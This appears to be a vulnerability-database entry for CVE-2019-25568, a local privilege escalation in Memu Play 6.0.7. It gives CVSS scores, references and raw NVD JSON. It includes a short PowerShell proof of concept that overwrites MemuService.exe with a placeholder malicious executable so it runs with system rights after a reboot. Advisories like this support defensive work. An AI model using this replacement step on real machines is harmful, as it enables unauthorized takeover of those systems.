Security Vulnerability Report
CVE-2019-25568 CVSS 9.8 CRITICAL

Published: 2026-03-21 13:16:20
Last Modified: 2026-04-21 16:48:38

Description

Memu Play 6.0.7 contains an insecure file permissions vulnerability that allows low-privilege users to escalate privileges by replacing the MemuService.exe executable. Attackers can rename and overwrite MemuService.exe in the installation directory with a malicious executable, which executes with system-level privileges when the service restarts after a computer reboot.

CVSS Details

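CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

The score above comes from the record's Secondary source. The Primary CVSS 3.1 assessment in the same record is 7.8 HIGH (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), which matches the description: a local, low-privilege user replaces the service executable.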

Configurations (Affected Products)

cpe:2.3:a:microvirt:memu:*:*:*:*:*:*:*:* - VULNERABLE
Memu Play 6.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
powershell
# PoC for CVE-2019-25568: Memu Play Privilege Escalation
# This script demonstrates replacing the service executable.
$TargetPath = "C:\Program Files\Microvirt\Memu\MemuService.exe"
$MaliciousPath = "C:\temp\evil.exe"

# Check if file exists
if (Test-Path $TargetPath) {
    # Step 1: Backup the original executable
    Move-Item -Path $TargetPath -Destination "$TargetPath.bak" -Force
    Write-Host "Original file backed up."

    # Step 2: Copy malicious payload to target location
    Copy-Item -Path $MaliciousPath -Destination $TargetPath -Force
    Write-Host "Malicious executable replaced successfully."

    # Step 3: Trigger execution (requires reboot or service restart)
    Write-Host "Privilege escalation will trigger on next service restart or reboot."
}
else {
    Write-Host "Target installation not found."
}

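References

https://www.exploit-db.com/exploits/46437 (Exploit, VDB Entry)
https://www.memuplay.com/ (Product)
https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release (Product)
https://www.vulncheck.com/advisories/memu-play-privilege-escalation-via-insecure-file-permissions (Third Party Advisory)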

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25568", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:20.470", "lastModified": "2026-04-21T16:48:38.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Memu Play 6.0.7 contains an insecure file permissions vulnerability that allows low-privilege users to escalate privileges by replacing the MemuService.exe executable. Attackers can rename and overwrite MemuService.exe in the installation directory with a malicious executable, which executes with system-level privileges when the service restarts after a computer reboot."}, {"lang": "es", "value": "Memu Play 6.0.7 contiene una vulnerabilidad de permisos de archivo inseguros que permite a usuarios con pocos privilegios escalar privilegios al reemplazar el ejecutable MemuService.exe. Los atacantes pueden renombrar y sobrescribir MemuService.exe en el directorio de instalación con un ejecutable malicioso, el cual se ejecuta con privilegios de nivel de sistema cuando el servicio se reinicia después de un reinicio del equipo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": 
"NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microvirt:memu:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.0.7", "matchCriteriaId": "E3CA96D5-3015-4FF0-9B03-B7E75782CFCD"}]}]}], "references": [{"url": 
"https://www.exploit-db.com/exploits/46437", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.memuplay.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/memu-play-privilege-escalation-via-insecure-file-permissions", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}